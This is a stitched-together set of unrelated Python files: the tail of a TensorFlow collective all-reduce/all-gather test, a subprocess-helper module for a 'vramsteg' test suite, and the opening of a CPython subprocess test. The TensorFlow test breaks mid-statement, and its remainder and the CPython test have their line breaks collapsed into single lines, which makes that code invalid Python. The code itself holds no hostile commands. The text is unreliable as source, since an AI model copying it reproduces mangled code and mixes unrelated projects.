    self.batch_reduce_and_verify(inputs_data, expect, options)

  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
      ))
  def testAllReduceDense(self, num_processes, required_gpus, implementation,
                         reduce_op):
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")

    def replica_fn():
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      group_size = num_processes * (required_gpus or 1)

      @def_function.function
      def collective_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = constant_op.constant(1.0)
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_all_reduce()
      if reduce_op == ReduceOp.SUM:
        expect = [1.0 * group_size] * len(devices)
      elif reduce_op == ReduceOp.MEAN:
        expect = [1.0] * len(devices)
      self.assertAllClose(got, expect)

      @def_function.function
      def collective_batch_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = (constant_op.constant(1.0), constant_op.constant(2.0))
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_batch_all_reduce()
      if reduce_op == ReduceOp.SUM:
        expect = [(1.0 * group_size, 2.0 * group_size)] * len(devices)
      elif reduce_op == ReduceOp.MEAN:
        expect = [(1.0, 2.0)] * len(devices)
      self.assertAllClose(got, expect)

    get_global_mpr(num_processes).run(replica_fn)

  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
      ))
  def testAllReduceSparse(self, num_processes, required_gpus, implementation,
                          reduce_op):
    if (required_gpus == 0 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip CPU + NCCL combination")
    if (num_processes == 2 and
        implementation == CommunicationImplementation.NCCL):
      self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
                    "physical GPUs for every process.")

    def replica_fn():
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      group_size = num_processes * (required_gpus or 1)

      @def_function.function
      def collective_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = IndexedSlices(
                values=array_ops.identity([[1.]]),
                indices=array_ops.identity([0]),
                dense_shape=array_ops.identity([5, 1]))
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_all_reduce()
      if reduce_op == ReduceOp.SUM:
        expect = [IndexedSlices([[1. * group_size]], [0], [5, 1])
                 ] * len(devices)
      elif reduce_op == ReduceOp.MEAN:
        expect = [IndexedSlices([[1.]], [0], [5, 1])] * len(devices)
      self.assertAllClose(
          nest.map_structure(ops.convert_to_tensor, got),
          nest.map_structure(ops.convert_to_tensor, expect))

      @def_function.function
      def collective_batch_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = (IndexedSlices(
                array_ops.identity([[1.]]), array_ops.identity([0]),
                array_ops.identity([5, 1])),
                     IndexedSlices(
                         array_ops.identity([[3.]]), array_ops.identity([2]),
                         array_ops.identity([5, 1])))
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_batch_all_reduce()
      if reduce_op == ReduceOp.SUM:
        expect = [(IndexedSlices([[1. * group_size]], [0], [5, 1]),
                   IndexedSlices([[3. * group_size]], [2], [5, 1]))
                 ] * len(devices)
      elif reduce_op == ReduceOp.MEAN:
        expect = [(IndexedSlices([[1.]], [0], [5, 1]),
                   IndexedSlices([[3.]], [2], [5, 1]))] * len(devices)
      self.assertAllClose(
          nest.map_structure(ops.convert_to_tensor, got),
          nest.map_structure(ops.convert_to_tensor, expect))

    get_global_mpr(num_processes).run(replica_fn)

  @combinations.generate(
      combinations.combine(
          num_processes=2,
          required_gpus=0,
          implementation=CommunicationImplementation.AUTO,
          reduce_op=ReduceOp.SUM))
  def testAllReduceMixedDenseAndSparse(self, num_processes, required_gpus,
                                       implementation, reduce_op):

    def replica_fn():
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      group_size = num_processes * (required_gpus or 1)

      @def_function.function
      def collective_batch_all_reduce():
        results = []
        for replica_id, device in enumerate(devices):
          with ops.device(device):
            value = (IndexedSlices(
                array_ops.identity([[1.]]), array_ops.identity([0]),
                array_ops.identity([5, 1])), array_ops.identity(1.0),
                     IndexedSlices(
                         array_ops.identity([[3.]]), array_ops.identity([2]),
                         array_ops.identity([5, 1])), array_ops.identity(2.0))
            results.append(
                collective._all_reduce(reduce_op, value, replica_id, options))
        return results

      got = collective_batch_all_reduce()
      expect = [
          (IndexedSlices([[1. * group_size]], [0], [5, 1]), 1.0 * group_size,
           IndexedSlices([[3. * group_size]], [2], [5, 1]), 2.0 * group_size)
      ] * len(devices)
      self.assertAllClose(
          nest.map_structure(ops.convert_to_tensor, got),
          nest.map_structure(ops.convert_to_tensor, expect))

    get_global_mpr(num_processes).run(replica_fn)

  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          axis=[0, 1, 2],
          func_mode=["eager", "func_graph"],
          implementation=[
              CommunicationImplementation.AUTO,
              CommunicationImplementation.RING,
              CommunicationImplementation.NCCL,
          ],
          prefer_unique_instance_key=[True, False]))
  def testAllGatherSameShape(self, num_processes, required_gpus, implementation,
                             func_mode, axis, prefer_unique_instance_key):

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = (
          prefer_unique_instance_key)
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      value = constant_op.constant([[[1, 2], [1, 2]]], dtype=dtypes.float32)

      def gather_fn():
        per_replica_value = make_per_replica_value(value, devices)
        gathered_values = collective._gather(
            per_replica_value, per_replica_value, axis=axis, options=options)
        gathered_values = self.as_list(gathered_values)
        # Skip checking devices in eager. In eager the device attribute doesn't
        # reflect the actual device of the tensor.
        if not context.executing_eagerly():
          self.assertAllEqual(devices, [v.device for v in gathered_values])
        return [ops.convert_to_tensor(v) for v in gathered_values]

      group_size = num_processes * (required_gpus or 1)
      expect = array_ops.concat([value] * group_size, axis=axis)
      per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)

      if func_mode == "eager":
        result = gather_fn()
        self.assertAllClose(result, per_replica_expect)

      if func_mode == "func_graph":
        result = def_function.function(gather_fn)()
        self.assertAllClose(result, per_replica_expect)

    get_global_mpr(num_processes).run(replica_fn)

  @combinations.generate(
      combinations.combine(
          num_processes=[1, 2],
          required_gpus=[0, 1, 2],
          implementation=[CommunicationImplementation.RING]))
  def testCollectiveV2ControlFlow(self, num_processes, required_gpus,
                                  implementation):

    def replica_fn():
      CollectiveReplicaLauncher._prefer_unique_instance_key = True
      collective, devices, _ = self.make_collective(num_processes,
                                                    required_gpus)
      options = collective_util.Options(implementation=implementation)
      value = make_per_replica_value(constant_op.constant([1.]), devices)

      @def_function.function
      def reduce_fn():

        def cond_body():
          reduced = collective.reduce(reduce_util.ReduceOp.SUM, value, value,
                                      options)
          return math_ops.add_n(self.as_list(reduced)) / len(devices)

        return control_flow_ops.cond(
            array_ops.identity(False), cond_body, cond_body)

      num_replicas = num_processes * len(devices)
      self.assertAllEqual(reduce_fn(), [1.
      # NOTE(review): source chunk is truncated here, mid-statement.
* num_replicas]) get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=1, required_gpus=2, implementation=[ CommunicationImplementation.NCCL, CommunicationImplementation.RING ], prefer_unique_instance_key=[True, False])) def testMultiThreadedCollectiveLaunchNoInterleave(self, num_processes, required_gpus, implementation, prefer_unique_instance_key): def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) # We would like to simulate the following sequence: # thread-0 device0 device1 # thread-1 device0 device1 # If the kernel launch sequence is as-is the program will deadlock since # NCCL requires the launch order to be same on each device. v0 = make_per_replica_value(1.0, devices) v1 = make_per_replica_value(2.0, devices) # Add a delay to collective_ops.all_reduce according to the input tensors # index in `sequence.` sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]] all_reduce = collective_ops.all_reduce def delayed_all_reduce(input_tensor, *args, **kwargs): for idx, v in enumerate(sequence): if input_tensor is v: time.sleep(idx) break return all_reduce(input_tensor, *args, **kwargs) with test.mock.patch.object(collective_ops, "all_reduce", delayed_all_reduce): # We only use NCCL for batch reduce with two or more values, so we use # two values here. 
def thread_fn(): reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v0, v0), (v0, v0)], options) self.assertAllEqual(reduced[0].values, [2.0, 2.0]) self.assertAllEqual(reduced[1].values, [2.0, 2.0]) t = threading.Thread(target=thread_fn) t.start() reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1), (v1, v1)], options) self.assertAllEqual(reduced[0].values, [4.0, 4.0]) self.assertAllEqual(reduced[1].values, [4.0, 4.0]) t.join() get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=1, required_gpus=2, implementation=[ CommunicationImplementation.NCCL, CommunicationImplementation.RING ], prefer_unique_instance_key=[True, False])) def testInputsAreFunctionArgs(self, num_processes, required_gpus, implementation, prefer_unique_instance_key): def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options(implementation=implementation) @def_function.function def reduce_fn(v): # Function inputs don't have device placement. self.assertEqual(v.values[0].device, "") self.assertEqual(v.values[1].device, "") # We only use NCCL for batch reduce with two or more values, so we use # two values here. 
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v), (v, v)], options) self.assertEqual(reduced[0].values[0].device, devices[0]) self.assertEqual(reduced[0].values[1].device, devices[1]) self.assertEqual(reduced[1].values[0].device, devices[0]) self.assertEqual(reduced[1].values[1].device, devices[1]) # Returning Mirrored only evaluates the primary value, which causes # hanging, return [reduced[0].values, reduced[1].values] v = make_per_replica_value(1.0, devices) reduced = reduce_fn(v) self.assertAllClose(reduced, [[2.0, 2.0], [2.0, 2.0]]) get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=[0, 1], implementation=[ CommunicationImplementation.RING, CommunicationImplementation.NCCL ], prefer_unique_instance_key=[True, False])) def testTimeoutReduceDense(self, num_processes, implementation, required_gpus, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, task_id = self.make_collective( num_processes, required_gpus) if task_id != 0: return v = make_per_replica_value(1.0, devices) options = collective_util.Options( timeout_seconds=1, implementation=implementation) @def_function.function def reduce_dense(): return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options) # The collective should time out because we only launch it on worker-0, # while there're three workers in total. 
with self.assertRaises(errors.DeadlineExceededError): reduce_dense() get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=[0, 1], implementation=[ CommunicationImplementation.RING, CommunicationImplementation.NCCL ], prefer_unique_instance_key=[True, False])) def testTimeoutBatchReduceDense(self, num_processes, implementation, required_gpus, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, task_id = self.make_collective( num_processes, required_gpus) if task_id != 0: return v = make_per_replica_value(1.0, devices) options = collective_util.Options( timeout_seconds=1, implementation=implementation) @def_function.function def batch_reduce_dense(): return collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v), (v, v)], options) # The collective should time out because we only launch it on worker-0, # while there're two workers in total. 
with self.assertRaises(errors.DeadlineExceededError): batch_reduce_dense() get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=[0, 1], implementation=[ CommunicationImplementation.RING, CommunicationImplementation.NCCL ], prefer_unique_instance_key=[True, False])) def testTimeoutReduceSparse(self, num_processes, implementation, required_gpus, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, task_id = self.make_collective( num_processes, required_gpus) if task_id != 0: return v = make_per_replica_value( IndexedSlicesValue( values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices) options = collective_util.Options( timeout_seconds=1, implementation=implementation) @def_function.function def reduce_sparse(): return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options) # The collective should time out because we only launch it on worker-0, # while there're two workers in total. 
with self.assertRaises(errors.DeadlineExceededError): reduce_sparse() get_global_mpr(num_processes).run(replica_fn) @combinations.generate( combinations.combine( num_processes=2, required_gpus=[0, 1], implementation=[ CommunicationImplementation.RING, CommunicationImplementation.NCCL ], prefer_unique_instance_key=[True, False])) def testTimeoutBatchReduceSparse(self, num_processes, required_gpus, implementation, prefer_unique_instance_key): if (required_gpus == 0 and implementation == CommunicationImplementation.NCCL): self.skipTest("Skip CPU + NCCL combination") def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = ( prefer_unique_instance_key) collective, devices, task_id = self.make_collective( num_processes, required_gpus) if task_id != 0: return v = make_per_replica_value( IndexedSlicesValue( values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices) options = collective_util.Options( timeout_seconds=1, implementation=implementation) @def_function.function def batch_reduce_sparse(): return collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v), (v, v)], options) # The collective should time out because we only launch it on worker-0, # while there're two workers in total. 
with self.assertRaises(errors.DeadlineExceededError): batch_reduce_sparse() get_global_mpr(num_processes).run(replica_fn) @combinations.generate(combinations.combine(num_processes=1, required_gpus=2)) def testNcclOrdering(self, num_processes, required_gpus): def replica_fn(): CollectiveReplicaLauncher._prefer_unique_instance_key = True CollectiveReplicaLauncher._prefer_ordering_token = True collective, devices, _ = self.make_collective(num_processes, required_gpus) options = collective_util.Options( implementation=CommunicationImplementation.NCCL) v_dense = make_per_replica_value([1.0, 1.0], devices) v_sparse = make_per_replica_value([ IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]), IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]), ], devices) @def_function.function def nested_dense(): collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) @def_function.function def nested_sparse(): collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # All collectives, function calls, if clause and while loops should be # chained by control dependencies, so that the execution order is # deterministic. @def_function.function def f(): # pylint: disable=pointless-statement collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # reducing dense value. collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) # reducing sparse value. collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # reduce dense value in nested tf.function. nested_dense() # reduce sparse value in nested tf.function. nested_sparse() # reduce dense value in tf.cond. if array_ops.identity(1.0) > array_ops.identity(2.0): collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) else: v_dense # reduce sparse value in tf.cond. if array_ops.identity(1.0) > array_ops.identity(2.0): v_sparse else: collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # reduce dense value in tf.while_loop. 
i = array_ops.identity(1) while i < 3: collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) i += 1 # reduce sparse value in tf.while_loop. i = array_ops.identity(1) while i < 3: collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) i += 1 # reducing dense and sparse value again. collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options) collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options) # pylint: enable=pointless-statement graph = f.get_concrete_function().graph should_be_ordered = set([ "CollectiveReduceV2", "CollectiveGatherV2", "If", "While", "StatefulPartitionedCall" ]) nodes_by_device = {} for op in graph.get_operations(): if op.type in should_be_ordered: if op.device not in nodes_by_device: nodes_by_device[op.device] = [] nodes_by_device[op.device].append(op) order = test_util.topological_sort_operations(graph.get_operations()) for device in devices: device = device_util.canonicalize(device) # Those function ops don't have device annotations, but they contain # collectives for both devices so we always include them. operations = nodes_by_device[device] + nodes_by_device[""] # Verify that we get all types of nodes we want. self.assertEqual(set(op.type for op in operations), should_be_ordered) test_util.assert_sequential_execution(order, operations) get_global_mpr(num_processes).run(replica_fn) if __name__ == "__main__": # Set default inter op thread pool size to one to ensure we don't exhaust the # thread pool with the additional executors to run collectives in eager. os.environ["TF_NUM_INTEROP_THREADS"] = "1" # TODO(b/172304955): figure why logical devices doesn't work. test_util.main(config_logical_devices=False)
utils.py
# -*- coding: utf-8 -*-
"""Helpers for the vramsteg test suite.

Provides subprocess helpers that capture output without deadlocking,
polling/wait utilities, and small temp-file conveniences.
"""
from __future__ import division

import os
import sys
import socket
import signal
import functools
import atexit
import tempfile

from subprocess import Popen, PIPE, STDOUT
from threading import Thread

try:
    from Queue import Queue, Empty
except ImportError:
    from queue import Queue, Empty

from time import sleep

try:
    import simplejson as json
except ImportError:
    import json

from .exceptions import CommandError, TimeoutWaitingFor

ON_POSIX = 'posix' in sys.builtin_module_names

# Directory relative to basetest module location
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))

# Location of binary files (usually the src/ folder)
BIN_PREFIX = os.path.abspath(
    os.path.join(CURRENT_DIR, "..", "..", "src")
)

# Default location of test certificates
DEFAULT_CERT_PATH = os.path.abspath(
    os.path.join(CURRENT_DIR, "..", "test_certs")
)

# Default location of test extensions
DEFAULT_EXTENSION_PATH = os.path.abspath(
    os.path.join(CURRENT_DIR, "..", "test_extensions")
)

# Environment flags to control skipping of vramsteg tests
VRAMSTEG_SKIP = os.environ.get("VRAMSTEG_SKIP", False)
# Environment flags to control use of PATH or in-tree binaries
VRAMSTEG_USE_PATH = os.environ.get("VRAMSTEG_USE_PATH", False)

UUID_REGEXP = ("[0-9A-Fa-f]{8}-" + ("[0-9A-Fa-f]{4}-" * 3) + "[0-9A-Fa-f]{12}")


def vramsteg_binary_location(cmd="vramsteg"):
    """Return the location of the vramsteg binary.

    ../src/ is used by default.
    """
    # BUGFIX: the original had an unreachable second `return` after the
    # first one (dead code). Delegate to binary_location so the lookup
    # policy lives in exactly one place; behavior is unchanged.
    return binary_location(cmd, VRAMSTEG_USE_PATH)


def binary_location(cmd, USE_PATH=False):
    """Return the full path of `cmd`.

    ../src/ is used by default.
    """
    # NOTE(review): USE_PATH is currently ignored — presumably a $PATH
    # lookup branch was planned; confirm before relying on it.
    return os.path.join(BIN_PREFIX, cmd)


def wait_condition(cond, timeout=1, sleeptime=.01):
    """Wait for condition to return anything other than None.

    Polls `cond` every `sleeptime` seconds for up to `timeout` seconds and
    returns the last value `cond` produced.
    """
    # NOTE Increasing sleeptime can dramatically increase testsuite runtime
    # It also reduces CPU load significantly
    if timeout is None:
        timeout = 1

    if timeout < sleeptime:
        print("Warning, timeout cannot be smaller than", sleeptime)
        timeout = sleeptime

    # Max number of attempts until giving up
    tries = int(timeout / sleeptime)

    for i in range(tries):
        val = cond()

        if val is not None:
            break

        sleep(sleeptime)

    return val


def wait_process(pid, timeout=None):
    """Wait for process `pid` to finish.

    Returns True once the process is gone, or None on timeout.
    """
    def process():
        try:
            # Signal 0 only checks for existence; it does not kill.
            os.kill(pid, 0)
        except OSError:
            # Process is dead
            return True
        else:
            # Process is still ticking
            return None

    return wait_condition(process, timeout)


def _queue_output(arguments, pidq, outputq):
    """Read/Write output/input of given process.

    This function is meant to be executed in a thread as it may block.
    Puts the child PID on `pidq` and (stdout, stderr, exitcode) on
    `outputq`.
    """
    kwargs = arguments["process"]
    input = arguments["input"]

    try:
        proc = Popen(**kwargs)
    except OSError as e:
        # pid None is read by the main thread as a crash of the process
        pidq.put(None)

        outputq.put((
            "",
            ("Unexpected exception caught during execution: '{0}' . ".format(e)),
            255))  # false exitcode

        return

    # Put the PID in the queue for main process to know.
    pidq.put(proc.pid)

    # Send input and wait for finish
    out, err = proc.communicate(input)

    if sys.version_info > (3,):
        out, err = out.decode('utf-8'), err.decode('utf-8')

    # Give the output back to the caller
    outputq.put((out, err, proc.returncode))


def _retrieve_output(thread, timeout, queue, thread_error):
    """Fetch output from binary subprocess queues.
    """
    # Try to join the thread on failure abort
    thread.join(timeout)
    # BUGFIX: Thread.isAlive() was removed in Python 3.9; is_alive() is
    # available on both Python 2.6+ and every Python 3.
    if thread.is_alive():
        # Join should have killed the thread. This is unexpected
        raise TimeoutWaitingFor(thread_error + ". Unexpected error")

    # Thread died so we should have output
    try:
        # data = (stdout, stderr, exitcode)
        data = queue.get(timeout=timeout)
    except Empty:
        data = TimeoutWaitingFor("streams from program")

    return data


def _get_output(arguments, timeout=None):
    """Collect output from the subprocess without blocking the main process
    if subprocess hangs.
    """
    # NOTE Increase this value if tests fail with None being received as
    # stdout/stderr instead of the expected content
    output_timeout = 0.1  # seconds

    pidq = Queue()
    outputq = Queue()

    t = Thread(target=_queue_output, args=(arguments, pidq, outputq))
    t.daemon = True
    t.start()

    try:
        pid = pidq.get(timeout=timeout)
    except Empty:
        pid = None

    # Process crashed or timed out for some reason
    if pid is None:
        return _retrieve_output(t, output_timeout, outputq,
                                "Program to start")

    # Wait for process to finish (normal execution)
    state = wait_process(pid, timeout)

    if state:
        # Process finished
        return _retrieve_output(t, output_timeout, outputq,
                                "Program thread to join")

    # If we reach this point we assume the process got stuck or timed out
    for sig in (signal.SIGABRT, signal.SIGTERM, signal.SIGKILL):
        # Start with lower signals and escalate if process ignores them
        try:
            # BUGFIX: was `os.kill(pid, signal.SIGABRT)`, which sent SIGABRT
            # on every iteration and never escalated to SIGTERM/SIGKILL as
            # the comment above intends. Send the loop's current signal.
            os.kill(pid, sig)
        except OSError as e:
            # errno 3 == ESRCH: the process finished/died between last
            # check and now
            if e.errno != 3:
                raise

        # Wait for process to finish (should die/exit after signal)
        state = wait_process(pid, timeout)

        if state:
            # Process finished
            return _retrieve_output(t, output_timeout, outputq,
                                    "Program to die")

    # This should never happen but in case something goes really bad
    raise OSError("Program stopped responding and couldn't be killed")


def run_cmd_wait(cmd, input=None, stdout=PIPE, stderr=PIPE,
                 merge_streams=False, env=os.environ, timeout=None):
    "Run a subprocess and wait for it to finish"

    if input is None:
        stdin = None
    else:
        stdin = PIPE

    if merge_streams:
        stderr = STDOUT
    else:
        stderr = PIPE

    # NOTE: env defaults to the live os.environ mapping, so changes to the
    # environment made after import are picked up — intentional here.
    arguments = {
        "process": {
            "args": cmd,
            "stdin": stdin,
            "stdout": stdout,
            "stderr": stderr,
            "bufsize": 1,
            "close_fds": ON_POSIX,
            "env": env,
        },
        "input": input,
    }
    out, err, exit = _get_output(arguments, timeout)

    if merge_streams:
        if exit != 0:
            raise CommandError(cmd, exit, out)
        else:
            return exit, out
    else:
        if exit != 0:
            raise CommandError(cmd, exit, out, err)
        else:
            return exit, out, err


def run_cmd_wait_nofail(*args, **kwargs):
    "Same as run_cmd_wait but silence the exception if it happens"
    try:
        return run_cmd_wait(*args, **kwargs)
    except CommandError as e:
        return e.code, e.out, e.err


def memoize(obj):
    """Keep an in-memory cache of function results given its inputs.
    """
    cache = obj.cache = {}

    @functools.wraps(obj)
    def memoizer(*args, **kwargs):
        key = str(args) + str(kwargs)
        if key not in cache:
            cache[key] = obj(*args, **kwargs)
        return cache[key]

    return memoizer


try:
    from shutil import which
    which = memoize(which)
except ImportError:
    # NOTE: This is shutil.which backported from python-3.3.3
    @memoize
    def which(cmd, mode=os.F_OK | os.X_OK, path=None):
        """Given a command, mode, and a PATH string, return the path which
        conforms to the given mode on the PATH, or None if there is no such
        file.

        `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
        of os.environ.get("PATH"), or can be overridden with a custom search
        path.
        """
        # Check that a given file can be accessed with the correct mode.
        # Additionally check that `file` is not a directory, as on Windows
        # directories pass the os.access check.
        def _access_check(fn, mode):
            return (os.path.exists(fn) and os.access(fn, mode) and
                    not os.path.isdir(fn))

        # If we're given a path with a directory part, look it up directly
        # rather than referring to PATH directories. This includes checking
        # relative to the current directory, e.g. ./script
        if os.path.dirname(cmd):
            if _access_check(cmd, mode):
                return cmd

            return None

        if path is None:
            path = os.environ.get("PATH", os.defpath)
        if not path:
            return None

        path = path.split(os.pathsep)

        if sys.platform == "win32":
            # The current directory takes precedence on Windows.
            if os.curdir not in path:
                path.insert(0, os.curdir)

            # PATHEXT is necessary to check on Windows.
            pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
            # See if the given file matches any of the expected path
            # extensions. This will allow us to short circuit when given
            # "python.exe". If it does match, only test that one, otherwise
            # we have to try others.
            if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
                files = [cmd]
            else:
                files = [cmd + ext for ext in pathext]
        else:
            # On other platforms you don't have things like PATHEXT to tell
            # you what file suffixes are executable, so just pass on cmd
            # as-is.
            files = [cmd]

        seen = set()
        for dir in path:
            normdir = os.path.normcase(dir)
            if normdir not in seen:
                seen.add(normdir)
                for thefile in files:
                    name = os.path.join(dir, thefile)
                    if _access_check(name, mode):
                        return name

        return None


def parse_datafile(file):
    """Parse .data files, treating files as JSON.
    """
    data = []
    with open(file) as fh:
        for line in fh:
            line = line.rstrip("\n")

            # Turn [] strings into {} to be treated properly as JSON hashes
            if line.startswith('[') and line.endswith(']'):
                line = '{' + line[1:-1] + '}'

            if line.startswith("{"):
                data.append(json.loads(line))
            else:
                data.append(line)
    return data


def mkstemp(data):
    """Create a temporary file that is removed at process exit.
    """
    def rmtemp(name):
        try:
            os.remove(name)
        except OSError:
            pass

    f = tempfile.NamedTemporaryFile(delete=False)
    # NOTE(review): NamedTemporaryFile opens in binary mode, so on Python 3
    # `data` must be bytes — confirm against callers.
    f.write(data)
    f.close()

    # Ensure removal at end of python session
    atexit.register(rmtemp, f.name)

    return f.name


def mkstemp_exec(data):
    """Create a temporary executable file that is removed at process exit.
    """
    name = mkstemp(data)
    os.chmod(name, 0o755)

    return name

# vim: ai sts=4 et sw=4
f3290e217fbb989a3843f8659f6af3d704f81a01174d5c8e6e7a4e0acfed2401.py
import unittest from test import test_support import subprocess import sys import signal import os import errno import tempfile import time import re import sysconfig try: import resource except ImportError: resource = None try: import threading except ImportError: threading = None mswindows = (sys.platform == "win32") # # Depends on the following external programs: Python # if mswindows: SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), ' 'os.O_BINARY);') else: SETBINARY = '' class BaseTestCase(unittest.TestCase): def setUp(self): # Try to minimize the number of children we have so this test # doesn't crash on some buildbots (Alphas in particular). test_support.reap_children() def tearDown(self): for inst in subprocess._active: inst.wait() subprocess._cleanup() self.assertFalse(subprocess._active, "subprocess._active not empty") def assertStderrEqual(self, stderr, expected, msg=None): # In a debug build, stuff like "[6580 refs]" is printed to stderr at # shutdown time. That frustrates tests trying to check stderr produced # from a spawned Python process. actual = re.sub(r"\[\d+ refs\]\r?\n?$", "", stderr) self.assertEqual(actual, expected, msg) class PopenTestException(Exception): pass class PopenExecuteChildRaises(subprocess.Popen): """Popen subclass for testing cleanup of subprocess.PIPE filehandles when _execute_child fails. 
""" def _execute_child(self, *args, **kwargs): raise PopenTestException("Forced Exception for Test") class ProcessTestCase(BaseTestCase): def test_call_seq(self): # call() function with sequence argument rc = subprocess.call([sys.executable, "-c", "import sys; sys.exit(47)"]) self.assertEqual(rc, 47) def test_check_call_zero(self): # check_call() function with zero return code rc = subprocess.check_call([sys.executable, "-c", "import sys; sys.exit(0)"]) self.assertEqual(rc, 0) def test_check_call_nonzero(self): # check_call() function with non-zero return code with self.assertRaises(subprocess.CalledProcessError) as c: subprocess.check_call([sys.executable, "-c", "import sys; sys.exit(47)"]) self.assertEqual(c.exception.returncode, 47) def test_check_output(self): # check_output() function with zero return code output = subprocess.check_output( [sys.executable, "-c", "print 'BDFL'"]) self.assertIn('BDFL', output) def test_check_output_nonzero(self): # check_call() function with non-zero return code with self.assertRaises(subprocess.CalledProcessError) as c: subprocess.check_output( [sys.executable, "-c", "import sys; sys.exit(5)"]) self.assertEqual(c.exception.returncode, 5) def test_check_output_stderr(self): # check_output() function stderr redirected to stdout output = subprocess.check_output( [sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"], stderr=subprocess.STDOUT) self.assertIn('BDFL', output) def test_check_output_stdout_arg(self): # check_output() function stderr redirected to stdout with self.assertRaises(ValueError) as c: output = subprocess.check_output( [sys.executable, "-c", "print 'will not be run'"], stdout=sys.stdout) self.fail("Expected ValueError when stdout arg supplied.") self.assertIn('stdout', c.exception.args[0]) def test_call_kwargs(self): # call() function with keyword args newenv = os.environ.copy() newenv["FRUIT"] = "banana" rc = subprocess.call([sys.executable, "-c", 'import sys, os;' 
